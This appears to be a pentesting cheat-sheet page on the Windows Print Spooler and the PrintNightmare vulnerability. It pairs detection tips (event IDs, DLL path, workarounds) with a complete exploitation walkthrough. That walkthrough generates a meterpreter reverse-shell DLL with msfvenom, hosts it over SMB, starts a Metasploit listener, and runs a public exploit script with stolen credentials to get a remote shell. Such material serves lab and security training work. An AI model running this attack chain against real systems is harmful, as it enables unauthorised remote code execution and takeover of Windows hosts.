# Windows Print Spooler Service

A service that is running on each computer that participates in the Print Services system. It uses any port between 49152 and 65535. It may be vulnerable to the PrintNightmare (CVE-2021-1675 / CVE-2021-34527).

### Investigation <a href="#investigation" id="investigation"></a>

```
# Check if the Print Spooler service is running
Get-Service -Name Spooler
```

### Detection <a href="#detection" id="detection"></a>

#### Services <a href="#services" id="services"></a>

1. Open Services.
2. We can find the Print Spooler on the Right Pane.
3. Double-click on it and see the details.

#### Malicious DLL Location <a href="#malicious-dll-location" id="malicious-dll-location"></a>

```
C:\Windows\System32\spool\drivers\x64\3\
```

#### Event Viewer <a href="#event-viewer" id="event-viewer"></a>

Open Event Viewer, and find event logs in the following directory in the left pane.\
If you want to filter by Event ID, use **"Filter Current Log"** in the right pane.

* Application and Services Logs/Microsoft/Windows/PrintService/Admin (Event ID: 808)
* Application and Services Logs/Microsoft/Windows/PrintService/Operational (Event ID: 316, 811)
* Application and Services Logs/Microsoft/Windows/SMBClient/Security (Event ID: 31017)
* Application and Services Logs/Microsoft/Windows/Sysmon/Operational (Event ID: 3, 11, 23, 26)
* Windows Logs/System (Event ID: 7031)

#### Packet Analysis (Wireshark) <a href="#packet-analysis-wireshark" id="packet-analysis-wireshark"></a>

Open .pcap file with Wireshark.

Filter packets with **"smb"** or **"smb2"**.

### PrintNightmare (Credential Required) <a href="#printnightmare-credential-required" id="printnightmare-credential-required"></a>

This is security vulnerability to remote code execution in print spooler service.\
It requires authentication (username/password).

#### 1. Check If RPC Endpoints Exist <a href="#id-1-check-if-rpc-endpoints-exist" id="id-1-check-if-rpc-endpoints-exist"></a>

```
impacket-rpcdump @<target-ip> | egrep 'MS-RPRN|MS-PAR'
# Protocol: [MS-RPRN]: Print System Remote Protocol 
# Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
```

If `MS-RPRN` and `MS-PAR` endpoints are found, try the following steps.

#### 2. Create & Host Malicious DLL <a href="#id-2-create-host-malicious-dll" id="id-2-create-host-malicious-dll"></a>

We create a malicious DLL for reverse shell.

```
mkdir share
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f dll -o ./share/malicious.dll
```

Then host it with SMB server in local machine.

```
impacket-smbserver share ./share/  -smb2support
```

#### 3. Start Local Listener <a href="#id-3-start-local-listener" id="id-3-start-local-listener"></a>

For receiving incoming connection, we need to prepare a listener.

```
msfconsole

msf > use exploit/multi/handler
msf > set payload windows/x64/meterpreter/reverse_tcp
msf > set lhost <local-ip>
msf > set lport <local-port>

msf > run -j

# Started reverse tcp

msf > jobs
```

#### 4. Run Exploit <a href="#id-4-run-exploit" id="id-4-run-exploit"></a>

```
git clone https://github.com/cube0x0/CVE-2021-1675
cd CVE-2021-1675
python3 CVE-2021-1675.py example.local/<username>:<password>@<remote-ip> '\\<local-ip>\share\malicious.dll'
```

Now we should get a target shell in msfconsole.

#### 5. Interact with Target System <a href="#id-5-interact-with-target-system" id="id-5-interact-with-target-system"></a>

Enter the target system via msfconsole.

```
msf> sessions
msf> sessions -i <session-id>
meterpreter> shell

C:\Windows\system32> whoami
```

### Workarounds <a href="#workarounds" id="workarounds"></a>

```
# Disable the Print Spooler service
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
```

### References <a href="#references" id="references"></a>

* [Microsoft](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527)
* [TryHackMe](https://tryhackme.com/room/printnightmarehpzqlp8)